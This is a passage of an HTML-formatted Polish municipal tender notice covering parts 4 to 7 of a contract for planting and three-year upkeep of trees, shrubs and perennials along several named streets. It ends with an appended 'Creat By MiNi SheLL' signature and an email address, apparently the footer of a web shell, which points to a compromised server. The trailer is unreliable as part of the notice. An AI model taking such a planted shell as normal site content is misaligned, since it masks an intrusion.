-krzewy liściaste 200 szt.,
- paliki (do drzew sadzonych w gruncie) -  13 komplety, 
-odciągi stalowe - 2 komplety,
- osłony przeciwsolne dla 3 drzew 
- ziemia ogrodnicza min. 21,5 m3,
- kora min. 2,1 m3,
-taśma ogrodnicza 157 mb,
-żwir drenarski wg potrzeb,
-chochoły z mat trzcinowych lub słomianych  wg potrzeb.
-przed wykonaniem dołu do posadzenia drzewa nr 17 (ul. Przebendowskich 5) wyjąć i zabezpieczyć należy rosnące tam bodziszki Tiny Monster, odzyskanymi roślinami, w równych częściach, podsadzić należy misy przy drzewach nr 16 (ul. Przebendowskich 38)  i nr 17 (ul. Przebendowskich 5);
-przy wykonywaniu dołów do sadzenia drzew może zaistnieć konieczność usunięcia części systemów korzeniowych wcześniej usuniętych drzew; Zamawiający przewiduje możliwość wystąpienia konieczności wykonania częściowego karczowania dla nie więcej niż 2 miejsc sadzenia drzew.
- wykonywania zabiegów pielęgnacyjnych w ciągu 3lat od daty wykonania nasadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4  - sadzenie i pielęgnację drzew wzdłuż ulic: Kilińskiego, Świętojańskiej, Legionów, Narutowicza- (załącznik nr 8 do SIWZ).
Wykonawca będzie zobowiązany do wykonania nasadzeń:
-drzew liściastych 13 szt. ,
-krzewów liściastych 193 szt., 
-materiały niezbędne do montażu 13 kompletów krat ochronnych,
- osłony przeciwsolne dla 13 drzew 
- ziemia ogrodnicza min. 21,5 m3,
- kora min. 1,8 m3,
-taśma ogrodnicza 77 mb,
-żwir drenarski wg potrzeb,
-chochoły z mat trzcinowych lub słomianych  wg potrzeb.
- wykonywania zabiegów pielęgnacyjnych w ciągu 3lat od daty wykonania nasadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5  - zagospodarowanie terenu zieleni w rejonie placu zabaw przy ul. Złotej - (załącznik nr 8 do SIWZ).
Wykonawca będzie zobowiązany do:
        - wprowadzenia roślinności ozdobnej: drzew 22 szt., krzewów 650 szt., traw 427 szt., bylin 1003 
szt.
	- ściółkowania nasadzeń korą i torfem odkwaszonym;
	- wygrodzenia nowych nasadzeń na okres pielęgnacji;
	- 3-letniej pielęgnacji nasadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6  - zagospodarowanie terenu przy ul. Kopernika - (załącznik nr 9 do SIWZ). 
Wykonawca będzie zobowiązany do:
- transport i ustawienie 10 sztuk donic  przy ul. Kopernika
- wprowadzenia roślinności ozdobnej: krzewy 40 szt., byliny 108 szt.
	- ściółkowania nasadzeń korą i torfem odkwaszonym;
	- wygrodzenia nowych nasadzeń na okres pielęgnacji;
	- 3-letniej pielęgnacji nasadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7  - zagospodarowanie terenu zieleni przy ul. Miętowej - (załącznik nr 10 do SIWZ).
Wykonawca będzie zobowiązany do:
- demontaż istniejącego szkieletu reklamy,
-zdjęcie darni -165m2, 
- wprowadzenia roślinności ozdobnej: krzewy 243 szt., byliny 199 szt., trawy ozdobne 113 szt.,
- ściółkowania nasadzeń korą i torfem odkwaszonym;
- 3-letniej pielęgnacji nasadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com